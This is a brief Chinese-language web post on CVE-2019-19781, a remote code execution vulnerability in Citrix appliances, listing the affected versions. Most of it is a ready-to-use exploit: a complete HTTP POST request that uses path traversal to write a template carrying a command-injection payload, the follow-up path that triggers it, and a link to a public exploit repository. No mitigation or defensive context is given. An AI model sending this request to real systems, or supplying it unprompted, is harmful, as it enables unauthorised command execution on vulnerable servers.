# CVE-2019-19781 Citrix 遠程代碼執行漏洞
==漏洞影響==
Citrix 13.x,12.1,12.0,11.1,10.5
==EXP1==
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1 Host: target-ip Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.23.0 NSC_NONCE: nsroot NSC_USER: ../../../netscaler/portal/templates/15ffbdca Content-Length: 89
url=http://example.com&title=test&desc=[% template.new('BLOCK' = 'print whoami') %]
Payload:
/vpn/../vpns/portal/test.xml
==EXP2==
https://codeload.github.com/jas502n/CVE-2019-19781/zip/master
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容